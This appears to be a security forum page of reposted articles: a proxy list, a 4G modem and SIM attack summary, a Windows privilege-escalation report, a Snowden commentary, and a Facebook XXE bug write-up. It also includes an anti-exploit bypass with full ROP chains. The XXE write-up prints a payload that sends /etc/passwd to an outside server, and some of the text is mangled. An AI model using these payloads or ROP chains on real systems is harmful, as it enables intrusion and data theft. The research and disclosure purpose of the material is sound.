74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.102.129.2:8080 75.148.236.49:3128 77.120.102.5:8080 77.120.102.6:8080 77.81.105.147:7808 77.81.105.147:8089 77.81.246.89:3128 80.152.195.199:8080 82.114.78.105:8080 82.117.163.74:8080 82.209.199.214:8080 83.64.150.22:8080 87.251.177.210:3128 88.159.140.239:80 89.132.187.153:8080 89.26.71.134:8080 Sursa: 31-12-14 | Fast Proxy Server List (3479) - Pastebin.com
  8. Nytro
    Exploiting Fundamental Weaknesses in Botnet Command and Control (C&C) Panels What Goes Around Comes Back Around ! Aditya K Sood BlackHat Security Conference Las Vegas, USA, 2014 Version 1.1 Abstract This research is primarily focused on the use of penetration testing approach to nd fundamental weaknesses and conguration aws re-siding in Command and Control (C&C) panels used by bot herders to manage botnets. This paper generalizes the ndings that have been noticed during testing and analysis of several C&C panels. Download: http://www.secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf
  9. Nytro
    Intel ME Secrets Hidden code in your chipset and how to discover what exactly it does Igor Skochinsky Hex-Rays RECON 2014 Montreal High-level overview of the ME Low-level details ME security and attacks Dynamic Application Loader Results Future work Download: http://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf
      • 1
      • Upvote
  10. Nytro
    [h=2]SniffPass – Simple Password Sniffer[/h] SniffPass is small password monitoring software (basically a password sniffer) that listens to your network, capture the passwords that pass through your network adapter, and display them on the screen instantly. SniffPass can capture the passwords of the following Protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords). You can use this utility to recover lost Web/FTP/Email passwords via your own network adapter. [h=2]Requirements[/h] SniffPass can capture passwords on any 32-bit Windows operating system (Windows 98/ME/NT/2000/XP/2003/Vista) as long as WinPcap capture driver is installed and works properly with your network adapter. You can also use SniffPass with the capture driver of Microsoft Network Monitor, if it’s installed on your system. Under Windows 2000/XP (or greater), SniffPass also allows you to capture TCP/IP packets without installing any capture driver, by using ‘Raw Sockets’ method. However, this capture method has the following limitation: On Windows XP/SP1 passwords cannot be captured at all – Thanks to Microsoft’s bug that appeared in SP1 update… On Windows Vista with SP1, only UDP packets are captured. TCP packets are not captured at all. On Windows 7, it seems that ‘Raw Sockets’ method works properly again, at least for now… Do note, this software is NOT designed to grab passwords from other machines on the network, and could do so but only if the computers were connected via a simple hub or unecrypted Wireless networks. You can download SniffPass v1.13 here: sniffpass.zip Or read more here. Sursa: SniffPass - Simple Password Sniffer - Darknet - The Darkside
  11. Nytro
    [h=3]4G Security: Hacking USB Modem and SIM Card via SMS[/h] Telecommunications operators are pushing fast and cheap 4G communications technology. Yet only the chosen few know just how insecure it is. While researching the security level of 4G communications, Positive Technologies experts managed to uncover USB modem vulnerabilities that allow a potential attacker to gain full control of the connected computer as well as to access a subscriber account on a mobile operator portal. Additionally, attacks on a SIM card using a binary SMS allow an intruder to sniff and decrypt traffic or lock the SIM. The team presented their reports on the topic at the PacSec 2014 (Tokyo) and the 31C3 (Hamburg). In this article, we will give you the digest of this research conducted by Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov, and Pavel Novikov. First, we would like to say a couple of words about the main purpose of the research. It is not only the matter of security for trendy smartphones that we use to read news feed in social networks. Multiple critical infrastructures including industrial control systems (SCADA) also implement digital mobile communication based on the GSM standard. Another example from everyday life is having your money stolen from bank accounts. No one would like to become a victim of that. Yet you might have seen small antenna on ATMs. Yes, it is also GSM. A modern wireless modem is a computer that uses a well-known OS (usually Linux or Android) and a number of multifunctional applications. The software and data transfer protocols contain some vulnerabilities that attackers have successfully exploited in the last several years, say, to unlock a modem or to unbind it from the operator. To solve the problem in one blow, many services got transferred to the web. Yet it resulted in even more vulnerabilities. For the research purposes, we used 6 different series of USB modems with 30 different firmware versions. Only 3 firmwares proved to be hack-resistant. What did we manage to do to the rest of them? First, we identified the gear. The documentation and search engines helped us with that. In some cases Google was even more useful: it gave us the password for Telnet access. However, for external communications we need http, not Telnet. Just connect the modem to a computer and manage it as a separate network node with web applications. It gives you the opportunity to launch an attack via a browser (CSRF, XSS, RCE). This way you will force the modem to give out a lot of useful information about itself. Besides obtaining data, we may use the modem to do the following: change DNS settings (to sniff traffic), change SMS center settings (to intercept and interfere with SMS), change the password on the self-service portal by sending an SMS (to transfer money by subscribing to a third-party service), lock the modem by deliberately entering wrong PIN or PUK codes, remotely "update" the modem's firmware to a vulnerable version. You may advance your attack even further by accessing the computer connected to the hacked modem. One way to do it is to install a USB keyboard driver, which causes the computer to identify the modem as an input device. Use this pseudo keyboard to issue the command to reboot the system from an external disk, aka the very same modem. Then all that is left to do is to install a bootkit that allows you to remotely control the device. You may check out the video for visual evidence: The best countermeasure any ordinary user should take is stop inserting this and that into your USB ports. By "this and that" we also mean innocent-looking USB modems that appear to be such small and harmless communication devices. We dedicated the second part of our research to SIM cards. The fact that a SIM card is a computer with an OS, file system, and multifunctional applications was proven long ago. As the German cryptographer Karsten Nohl demonstrated at the Positive Hack Days conference, SIM applications (TARs) are protected in different ways. Some you may hack by brute-forcing DES keys. Some respond to an external command without any protection whatsoever and may give out a lot of sensitive information. To brute-force DES keys, we use a set of field-programmable gate arrays (FPGA), which became trendy for Bitcoin mining a couple of years ago and got cheaper after the hype was over. The speed of our 8 modules *ZTEX 1.15y board with the price tag of 2,000 Euro is 245.760 Mcrypt/sec. It is enough to obtain the key within 3 days. Then we may easily issue commands to well-known TARs and manage them; e.g. Card Manager allows installing a Java application to the SIM. Another curious TAR is a file system that stores TMSI (Temporary Mobile Subscriber Identity) and Kc (Ciphering Key). We may perform the following actions via a binary SMS: decrypt subscriber traffic without using brute force attacks on DES, spoof a subscriber's identity (receive his/her calls and SMS), track a subscriber's whereabouts, cause DOS by entering 3 wrong PIN codes and 10 wrong PUK codes in a row if PIN code is enabled for file system protection. It’s worth to note that the attack described above could successfully circumvent not only A5/1 (the most commonly used cellphone encryption algorithm for 2G networks), but also the stronger versions of encryption used in 3G and 4G. In conclusion, let us look at basic statistics. We used more than 100 SIM cards of different origin for the research, around 20% of those have vulnerabilities mentioned earlier, which means every fifth SIM card is flawed. Even so, it is hard to give any security advice to end users. These attacks are mostly targeting basic technological level vulnerabilities, and it is manufactures and telcos' task to fix them. The world press has already described this research as "SMS pwnage on MEELLIONS of flawed SIM cards, popular 4G modems". ?????: Positive Research ?? 11:26 PM Sursa: Positive Research Center: 4G Security: Hacking USB Modem and SIM Card via SMS
  12. Nytro
    Windows: Elevation of Privilege in ahcache.sys/NtApphelpCacheControl Platform: Windows 8.1 Update 32/64 bit (No other OS tested) On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways. It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for an UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse. It's unclear if Windows 7 is vulnerable as the code path for update has a TCB privilege check on it (although it looks like depending on the flags this might be bypassable). No effort has been made to verify it on Windows 7. NOTE: This is not a bug in UAC, it is just using UAC auto elevation for demonstration purposes. The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. I'd recommend running on 32 bit just to be sure. To verify perform the following steps: 1) Put the AppCompatCache.exe and Testdll.dll on disk 2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables). 3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll". 4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. [TABLE] [TR] [TD] [/TD] [TD] poc.zip 110 KB Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?id=118#c3
  13. Nytro
    [h=3]MBAE (Malware Bytes Anti Exploit) Disarm[/h] Not very long ago, security industry shifted from malwares to exploits. Though malware industry still dominates the market due to its sophistication and reach, exploits are nothing but the new sexy. Just like in old days antivirus were starting up, exploit detection systems are increasing nowadays and malware enthusiasts are shifting towards this trend. Exploits can get you more money, much much more than what malware authors get by selling their creations. Not to mention the fame that goes with exploit development (automatically being a whitehat, if you disclosed a 0day responsibly or not) is also more in quantity and won't feel embarrassing to tell others as compared to a malware author. While malware authors are always considered blackhats, exploit authors are born whitehats even though they do shady business. =) Market trend gave away the two most used exploit detection free toolkits 1. EMET 2. MBAE And despite the false positives and fake alerts, they both pack quite a punch. After searching a while i found an article from offensive security which claimed to bypass EMET successfully. Though the method they used was out of the box, EMET doesn't get updated that regularly so its fine i guess. EMET disarming By OffSec TLDR: The logic behind this attack was a global switch which can be used to protect & unprotect applications. If you alter it, all protections go kaputt. In this blogpost i will be covering something similar to bypass all of MBAE's checks. [h=3]Epilogue[/h] for the sake of reader i have already hosted the POC of mbae bypass at my Github Acc POC: Github Note: i have modified a POC i got from a public forum, and simply added Rop Gadgets. [h=3]Prologue[/h] Kafeine had done quite a piece on malware bytes making them seem like a very different company offering a unique product. malware.dontneedcoffee [h=3]Story[/h] So i got my hands on MBAE. Pretty nice UI ima. Unlike most exploit authors, instead of working on a public heap corruption exploit i tried to execute my favourite and oldest exploit. The very first i ever laid my hands on, CVE-2010-3333. With html based exploits we have few advantages: 1. we can use DOM to check for presence of specific dll's (for detection of EMET or MBAE) 2. If we leverage information leak vuln, we can build a rop chain with static offsets from inside dll memory in runtime. 3. we can place strings on heap and address it, by relying on deterministic nature of heap. Thus planting strings in ROP gets easy (as done by offsec in their disarming EMET article) But in StackOverflows, only thing we have is EIP and 1 looooong ROP chain. However good for us, CVE-2010-3333 works on Windows XP-7 without ROP. On windows 8, DEP is enforced so it crashes. Nevertheless we will circumvent all that later. so i searched google for some public exploit POC, and i found one at a random forum. moment i executed that sample, MBAE caught it. Upon investigation i found out that MBAE was enforcing DEP in all processes it protected. Thus from XP-7 we cannot execute this exploit without ROP. So i went ahead and asked mona to generate a Rop Chain for VirtualProtect. Appending rop gadgets 0x78833e3c, # POP EAX # RETN 0x788011c0, # ptr to VirtualProtect() 0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x78832a79, # POP EBX # RETN 0x00000201, # 0x00000201-> ebx 0x7880a254, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x78854775, # POP EBP # RETN 0x788b7b2b, # jmp esp 0x7889363e, # POP ECX # RETN 0x78922ad5, # &Writable location msxml5.dll 0x788fad49, # POP EDI # RETN 0x788880d4, # RETN (ROP NOP) 0x78833e3c, # POP EAX # RETN 0x90909090, # nop 0x788172ee, # PUSHAD # RETN The final exploit should work in Enforced DEP. However i was greeted by following upon detonation. Time to open the box VirtualProtect Seems Hooked Nothing useful inside first routine Interesting stuff VirtualProtect seems protected by CallPrecedenceCheck from RopGuard RopGuard_RopCheck - Ivan Fratric Moving on after checking is performed forward jump Actual Routine Prologue The automated systems i have seen by now perform nested hook filtering, meaning if they caught Kernelbase!VirtualProtect() they will skip Kernelbase!VirtualProtectEx() & Ntdll!ZwProtectVirtualMemory(). So it seems MBAE has only 1 protection which detects if return address was preceded by a call instruction. Lets see whats inside that protection then we can try to circumvent it. I was surprised to see this code, judging by the look it seems the developers of this tool quite 'literally' copied the code from RopGuard. When i say quite literally i do mean literally, because apparently they dont know what this code does. Allow me to give an insight return address - 3 is compared to 0xE8 (opcode for 16bit call instruction) if its equal then return a value which corresponds to legitimate reply. return address - 5 is compared to 0xE8 (opcode for 32bit call instruction) if its equal then return a value which corresponds to legitimate reply. When the developers blindly copied this code they perhaps didn't knew that 1. if ROP gadget which jumps into hooked api has either -5th or -3rd byte 0xE8, the check is failing 2. all a person has to do is search for this pattern in binary [?E8][XX][?E8][XX][XX][C3] to bypass the check 3. exploit author can simply VirtualProtect and return into stack at a nop sled which can be preceded by 0xE8 since we very well control stack to defeat this check easily 4. This mistake is repeated with return address -7 being compared to 0x9A (opcode for FAR CALL) and return address - 5 being compared to 0x9A again. (opcode for FAR call but with 16bit address) Blunder: Leaving aside the mistakes it has, the code is meant to be written for 32bit binaries. But apparently developers never bothered to check 1. If return address - 3 == 0xE8 && return address - 4 == 0x66 (prefix for 16bit call in 32bit address space) these two checks should be performed side by side for accuracy, but right now the check is if return address - 3 ==0xE8 || return addresss - 5 ==0xE8. 2. DWORD*(return address - 4) + return address - 5 should be equal to VirtualProtect, Apparently developers of this tool checked if there is a call instruction before return address but didn't check if that call is leading to hooked API or not. () (>_<) 3. If you do call a 16bit address from a 32bit address space you can only call upto 0xFFFF, if detection was concerned, no legitimate or illegitimate code can ever call an API within 0xFFFF because dll's are mapped at higher addresses closer to 0x7fffffff, Thus this check is nearly useless for detection as its useful for potential candidates looking to find flaws in this method. 4. I am pretty sure the author of RopGuard meant to simply include 16bit and 32bit Rop check in 1 package but he meant to use them one at a time depending on application architecture. But who cares. So it seems blind cope paste is not only done by engineering students, but by 'professional' developers also. VirtualProtect Returns into stack preceded by handcrafted dummy 0xE8 bytes thus bypassing ROP detection from call precedence check. While i crafted this chain by just altering 2 bytes off an already existing rop chain, i thought it would bypass MBAE completely. But it failed yet again. So i dug deeper. VirtualProtectEx is also hooked inside hook It seems that unlike usual methods of hooking 1 API and leaving its nested ones by using a global variable or a TLS entry for IPC, MBAE infact hooks all nested API's of VirtualProtect and performs different checks on either levels. Thus there are more checks, and that is why i wasn't able to bypass MBAE when using previous ROP chain with 2 modified bytes. VirtualProtectEx checking if lpAddress param of VirtualProtect is inside stack Checks inside ZwProtectVirtualMemory 1. StackPivot Check 2.RopGuardCallPrecedenceCheck 3.Checking if stack is being made executable Up until now, for VirtualProtect API there are only 3 protections which detect ROP. There are more protections to check if api call is from shellcode, but i dont think detecting that is necessary because once you get opcode execution these petty checks can be circumvented by n number of measures. one example being: changing PEB entry of loaded module to [x] and copying any PE header to shellcode -0x1000 address ([x]) which can be done in nearly 25 bytes using handcrafted optimized shellcode. [h=3]One Byte Issue[/h] To defeat all these protections, i followed offsec's approach. There was a global switch, a fixed offset which decided the fate of MBAE's protections. in previous images you might see a reoccurring instruction. cmp dword ptr ds:[<Magic_Offset>],0 je <mbae.LegitimateCall> This magic offset is actually a dword but it has only 2 possible values. 0 or 1 if its 0 all protections are disabled and this check will jump over detection mechanisms. if its 1 all protections are enabled and all checks will be performed with full functionality. (another way to bypass MBAE's shellcode checks) As of now December 10th 2014, this offset is 0x47C08. protection check Highlighted Now since we have a stack overflow, we cannot craft any data dynamically. So we have to perform a makeshift ROP chain which will somehow find mbae.dll's base address and then add offset to its value. Then moving null into that address. Then we can use our ROP chain used before. After 20 minutes of mind boggling i came up with following rop chain 0x78833e3c, # POP EAX # RETN 0x78801108, # GetModuleHandle Address from IAT 0x78830e9a, # MOV EAX,[EAX] # RETN 0x788543e9, # XCHG EAX,EDX # RETN 0x7882ab5d, # PUSH ESP # POP ESI # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x788079f0, # POP EBP # RETN 0x0000008c, # offset from esp pointing towards mbae.dll 0x788d0ba7, # ADD EAX,EBP # RETN # eax points to mbae.dll 0x7889363e, # POP ECX # RETN 0x7889363f, # RETN 0x788fad49, # POP EDI # RETN 0x7889363f, # RETN 0x7880126c, # POP ESI # RETN 0x7888e209, # ADD ESP,0xC 0x788172ee, # PUSHAD # RETN #EAX gets base address of mbae.dll 0x788079f0, # POP EBP # RETN magic_offset, 0x788d0ba7, # ADD EAX,EBP # RETN # eax points to magic offset 0x7880A254, # POP EDX, RETN 0x00000000, # NULL 0x78907a82, # MOV [EAX],EDX # RETN 0x78833e3c, # POP EAX # RETN 0x788011c0, # ptr to VirtualProtect() 0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x78832a79, # POP EBX # RETN 0x00000201, # 0x00000201-> ebx 0x7880a254, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x78854775, # POP EBP # RETN 0x788b7b2b, # jmp esp 0x7889363e, # POP ECX # RETN 0x78922ad5, # &Writable location msxml5.dll 0x788fad49, # POP EDI # RETN 0x788880d4, # RETN (ROP NOP) 0x78833e3c, # POP EAX # RETN 0x90909090, # nop 0x788172ee, # PUSHAD # RETN data appended: 9090eb09 6d6261652e646c6c00 (mbae.dll string) 909090909090909090909090909090909090 (nop sled) Since we had a stack overflow at our disposal, i had to embedd mbae.dll string in between nop sled, so ROP gadgets can take its address by reading esp. Had this been a Heap corruption vulnerability or a UAF, it would have been much more easy. Nevertheless i managed to bypass MBAE in nearly 40 gadgets, which means not much stack space is wasted. This offset can be utilized in browser exploits in a better way, exploits have the power to detect if they are running under malware bytes or emet's protection by reading system dll's. Up until now they just exit if they are running under such an environment, But it seems they dont need to. All an author has to do is simply change the gadgets as per exploit's requirement. This gadget chain can be reproduced very easily for any other kind of exploit, since the gadgets i used are not at all complicated and can be found in any dll with a very good probability. Afterwards this revelation, the exploit was fairly straightforward. After disabling MBAE, ROP gadgets trying to mark stack as RWX Et' Voila Posted by r41p41 at 12:06 Sursa: Scrutiny from an Inquisitive mind: MBAE (Malware Bytes Anti Exploit) Disarm
  14. Nytro
    Abusing, Exploiting and Pwning with Firefox Add-ons Ajin Abraham AJINABRAHAM.COM www.keralacyberforce.in ajin25@gmail.com Abstract This paper discuss about a number of ways through which hackers can use Mozilla Firefox as a platform to run there malicious piece of code with all the privileges and features as that supported by any native programming languages. Also there is an advantage that these malicious codes remain stealthy and undetected against anti-virus solutions. Malicious Firefox add-ons can be coded to serve this purpose. Mozilla Firefox Browser Engine acts just like a compiler or interpreter to execute your codes without much security concerns. The coding technologies for add-on development can be abused and exploited to create malicious add-ons. This paper explains how Firefox’s insecure policies and add-on development technologies like JavaScript, CORS, Web Socket, XPCOM and XPConnect can be abused by a hacker for malicious purposes. The widely popular browser add-ons can be utilized by hackers to implement new malware attack vectors. This paper is supported by proof of concept add-ons which are developed by exploiting the weakness in Firefox add-on coding. The proof of concept includes the implementation of a local keylogger, a remote keylogger, spawning a reverse shell, stealing the Firefox user session data, stealing Linux password files and Distributed Denial of Service (DDoS) Attack. All of these attack vectors are fully undetectable against anti-virus solutions and can bypass filters or protection mechanisms. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/24541.pdf
      • 1
      • Upvote
  15. Nytro
    [h=3]On the new Snowden documents[/h] If you don't follow NSA news obsessively, you might have missed yesterday’s massive Snowden document dump from Der Spiegel. The documents provide a great deal of insight into how the NSA breaks our cryptographic systems. I was very lightly involved in looking at some of this material, so I'm glad to see that it's been published (i.e., I can now stop looking over my shoulder). Unfortunately with so much material, it can be a bit hard to separate the signal from the noise. In this post I’m going to try to do that a little bit -- point out the bits that I think are interesting, the parts that are old news, and the things we should keep an eye on. Background Those who read this blog will know that I’ve been wondering for a long time how NSA works its way around our encryption. This isn't an academic question, since it affects just about everyone who uses technology today. What we've learned since 2013 is that NSA and its partners hoover up vast amounts of Internet traffic from fiber links around the world. Most of this data is plaintext and therefore easy to intercept. But at least some of it is encrypted -- typically protected by protocols such as SSL/TLS or IPSEC. Conventional wisdom pre-Snowden told us that the increasing use of encryption ought to have shut the agencies out of this data trove. Yet the documents we’ve seen so far indicate that the opposite has happened. Instead, the NSA and GCHQ has somehow been harvesting massive amounts of SSL/TLS and IPSEC traffic, and appear to be making inroads into other technologies such as Tor as well. How are they doing this? To repeat an old observation, there are basically three ways to crack an encrypted connection: Go after the mathematics. This is expensive and unlikely to work well against modern encryption algorithms (with a few exceptions). The leaked documents give very little evidence of such mathematical breaks — though a bit more on this below. Go after the implementation. The new documents confirm a previously-reported and aggressive effort to undermine commercial cryptographic implementations. The new documents provide context for how important this type of sabotage is to the NSA. Steal the keys. Of course, the easiest way to attack any cryptosystem is simply to steal the keys. Yesterday we received a bit more evidence that this is happening. I can’t possibly spend time on everything that’s covered by these documents — you should go read them yourself — so below I’m just going to focus on the highlights. Not so Good Will Hunting First, the disappointing part. The NSA may be the largest employer of cryptologic mathematicians in the United States, but — if the new story is any indication — those guys really aren’t pulling their weight. In fact, the only significant piece of cryptanalytic news in the entire stack comes is a 2008 undergraduate research project looking at AES. Sadly, this is about as unexciting as it sounds -- in fact it appears to be nothing more than a summer project by a visiting student. More interesting is the context it gives around the NSA’s efforts to break block ciphers such as AES, including the NSA's view of the difficulty of such cryptanalysis, and confirmation that NSA has some ‘in-house techniques’. Additionally, the documents include significant evidence that NSA has difficulty decrypting certain types of traffic, including Truecrypt, PGP/GPG, Tor and ZRTP from implementations such as RedPhone. Since these protocols share many of the same underlying cryptographic algorithms — RSA, Diffie-Hellman, ECDH and AES — some are presenting this as evidence that those primitives are cryptographically strong. As with the AES note above, this ‘good news’ should also be taken with a grain of salt. With a small number of exceptions, it seems increasingly obvious that the Snowden documents are geared towards NSA’s analysts and operations staff. In fact, many of the documents seem geared towards actually protecting knowledge of NSA's cryptanalytic capabilities from NSA's own operational staff (and other Five Eyes partners). As an analyst, it's quite possible you'll never learn why a given intercept was successfully decrypted. To put this a bit more succinctly: the lack of cryptanalytic red meat in these documents may not truly be representative of the NSA’s capabilities. It may simply be an artifact of Edward Snowden's clearances at the time he left the NSA. Tor One of the most surprising aspects of the Snowden documents — to those of us in the security research community anyway — is the NSA’s relative ineptitude when it comes to de-anonymizing users of the Tor anonymous communications network. The reason for our surprise is twofold. First, Tor was never really designed to stand up against a global passive adversary — that is, an attacker who taps a huge number of communications links. If there’s one thing we’ve learned from the Snowden leaks, the NSA (plus GCHQ) is the very definition of the term. In theory at least, Tor should be a relatively easy target for the agency. The real surprise, though, is that despite this huge signals intelligence advantage, the NSA has barely even tested their ability to de-anonymize users. In fact, this leak provides the first concrete evidence that NSA is experimenting with traffic confirmation attacks to find the source of Tor connections. Even more surprising, their techniques are relatively naive, even when compared to what’s going on in the ‘research’ community. This doesn’t mean you should view Tor as secure against the NSA. It seems very obvious that the agency has identified Tor as a high-profile target, and we know they have the resources to make much more headway against the network. The real surprise is that they haven’t tried harder. Maybe they're trying now. SSL/TLS and IPSEC A few months ago I wrote a long post speculating about how the NSA breaks SSL/TLS. Because it’s increasingly clear that the NSA does break these protocols, and at relatively large scale. The new documents don’t tell us much we didn’t already know, but they do confirm the basic outlines of the attack. The first portion requires endpoints around the world that are capable of performing the raw decryption of SSL/TLS sessions provided they know the session keys. The second is a separate infrastructure located on US soil that can recover those session keys when needed. All of the real magic happens within the key recovery infrastructure. These documents provide the first evidence that a major attack strategy for NSA/GCHQ involves key databases containing the private keys for major sites. For the RSA ciphersuites of TLS, a single private key is sufficient to recover vast amounts of session traffic — in real time or even after the fact. The interesting question is how the NSA gets those private keys. The easiest answer may be the least technical. A different Snowden leak shows gives some reason to believe that the NSA may have relationships with employees at specific named U.S. entities, and may even operate personnel “under cover”. This would certainly be one way to build a key database. But even without the James Bond aspect of this, there’s every reason to believe that NSA has other means to exfiltrate RSA keys from operators. During the period in question, we know of at least one vulnerability (Heartbleed) that could have been used to extract private keys from software TLS implementations. There are still other, unreported vulnerabilities that could be used today. Pretty much everything I said about SSL/TLS also applies to VPN protocols, with the additional detail that many VPNs use broken protocols and relatively poorly-secured pre-shared secrets. The NSA seems positively gleeful about this. Open Source packages: Redphone, Truecrypt, PGP and OTR The documents provide at least circumstantial evidence that some open source encryption technologies may thwart NSA surveillance. These include Truecrypt, ZRTP implementations such as RedPhone, PGP implementations, and Off the Record messaging. These packages have a few commonalities: They’re all open source, and relatively well studied by researchers. They’re not used at terribly wide scale (as compared to e.g., SSL or VPNs) They all work on an end-to-end basis and don’t involve service providers, software distributers, or other infrastructure that could be corrupted or attacked. What’s at least as interesting is which packages are not included on this list. Major corporate encryption protocols such as iMessage make no appearance in these documents, despite the fact that they ostensibly provide end-to-end encryption. This may be nothing. But given all we know about NSA’s access to providers, this is definitely worrying. A note on the ethics of the leak Before I finish, it's worth addressing one major issue with this reporting: are we, as citizens, entitled to this information? Would we be safer keeping it all under wraps? And is this all 'activist nonsense'? This story, more than some others, skates close to a line. I think it's worth talking about why this information is important. To sum up a complicated issue, we live in a world where targeted surveillance is probably necessary and inevitable. The evidence so far indicates that NSA is very good at this kind of work, despite some notable failuresin actually executing on the intelligence it produces. Unfortunately, the documents released so far also show that a great deal of NSA/GCHQ surveillance is not targeted at all. Vast amounts of data are scooped up indiscriminately, in the hope that some of it will someday prove useful. Worse, the NSA decided that this bulk surveillance justifies its efforts to undermine confidence in many of the security technologies that protect our own information systems. The President's own hand-picked review council has strongly recommended this practice be stopped, but their advice has -- to all appearances -- been largely disregarded. These are matters that are worthy of debate, but this debate that largely hasn't happened. Unfortunate if we can't enact changes to fix these problems, technology is probably about all that's left. Over the next few years encryption technologies are going to be widely deployed, not only by individuals but also by corporations desperately trying to reassure overseas customers who doubt the integrity of US technology. In that world, it's important to know what works and doesn't work. Insofar as this story tells us that, it makes us all better off. Posted by Matthew Green at 5:53 PM Sursa: A Few Thoughts on Cryptographic Engineering: On the new Snowden documents
  16. Nytro

    Ce are individul asta?

    Nytro replied to a topic in Off-topic

    @FarSe ?
  17. Nytro
    China transform? cuptorul cu microunde în arm? non-letal? capabil? s? provoace dureri insuportabile Aurelian Mihai - 29 dec 2014 Instalat deasupra unui camion militar, dispozitivul botezat Poly WB-1 con?ine o versiune modificat? a magnetronului folosit pentru înc?lzirea rapid? a alimentelor în cuptorul cu microunde. Ajutat cu o anten? deflectoare, dispozitivul poate transmite un fascicul de unde radio cu intensitate redus? la distan?e de pân? la 1Km. Fasciculul cu lungime de und? de ordinul milimetrilor poate penetra doar straturile superioare ale pielii, suficient pentru a induce dureri insuportabile ?i senza?ie de arsur?. zoom inPoly WB-1 Prezentat? drept arm? neletal?, Poly WB-1 ar putea fi folosit? de autorit??i pentru dispersarea mul?imilor de protestatari ?i incapacitarea trupelor de solda?i pe câmpul de b?t?lie, stopând astfel conflictele armate f?r? a recurge la arme letale. Aparent, dispozitivul prea voluminos pentru a fi inclus în recuzita trupelor de ordine va fi instalat doar pe vehicule blindate ale armatei, complementând tradi?ionalele tunuri cu ap? sub presiune ?i arsenalul de gaze lacrimogene. Un dispozitiv similar numit Raytheon Active Denial System a mai fost testat ?i în Statele Unite în anul 2007 ca mijloc pentru controlul mul?imilor, îns? a fost abandonat în cele din urm? din cauza unor limit?ri de ordin tehnic. Aparent, prototipul creat necesita 18 ore pentru a porni ?i avea un consum uria? de combustibil la func?ionarea în regim de a?teptare. Probabil, publicitatea negativ? ?i tema autorit??ilor fa?? de reac?ia opiniei publice este de ajuns deocamdat? pentru a descuraja folosirea unei astfel de arme, existenta sa în arsenalul Chinei servind doar ca factor de intimidare. Sursa: China transform? cuptorul cu microunde în arm? non-letal? capabil? s? provoace dureri insuportabile
  18. Nytro
    Facebook hacking using a forged Microsoft Word document By Delwyn Pinto on December 29, 2014 Facebook hacking using a forged Microsoft Word document Mohamed Ramadan, a white hat security researcher, has found a critical vulnerability in Facebook which lets user control using a forged Microsoft Word .docx file. Ramadan has successfully found vulnerabilities in major service providers like Google, Facebook, Twitter, Microsoft etc. and has been rewarded with bug bounty reward by them. Known Vulnerabilities It is a known fact that Facebook does not have the most secure servers in the world. Many people have reported high severity bugs since 2010 and the social network had also patched a dangerous XXE Vulnerability affecting OpenID in late 2013. An XXE (XML External Entity ) is a method that exploits a weak XML parsing mechanism. This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts. You can read more about these fixes here. Facebook had clarified that it had fixed all of its servers so finding another XXE vulnerability seemed highly unlikely. Yet Ramadan decided to continue his quest. After some digging, he came onto Facebook’s career page https://www.facebook.com/careers/ . He successfully uploaded his CV onto Facebook but he realized he could only upload files in PDF or .DOCX formats. A .docx file format is basically a zipped xml files developed by Microsoft and Ramadan saw a loophole in Facebook’s security system. He created a fake CV with forged Microsoft Word document and uploaded onto the the Facebook careers web page. He created an XML file with the following code written in it DOCTYPE root [ <!ENTITY % file SYSTEM “file:///etc/passwd”> dtd SYSTEM “http://197.37.102.90/ext.dtd”> %dtd; %send; ]=]=> Now he had a forged CV ready. He started a HTTP server running on Python on his local machine. He made a file named ext.dtd waiting in mohaab007 directory and here is the content of ext.dtd: <!ENTITY % all “ x25; send SYSTEM ‘http://197.37.102.90/FACEBOOK-HACKED?%25file;’>” > %all; After uploading the forged Word CV he waited for response from Facebook website. As he states on his blog, “Now everything is good and then I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened. I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minute or so chatting and browsing now it is time to stop python http server and close Facebook and everything . I was going to close my terminal window and I was shocked to see that something connected to my python http server” He had successfully managed to fool a Facebook server to connect to his server. In his own words, he could now exploit this connection to: DoS the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con TCP scans using HTTP external entities (including behind firewalls since application servers often have worldview different from that of the attacker) Unauthorised access to data stored as XML files 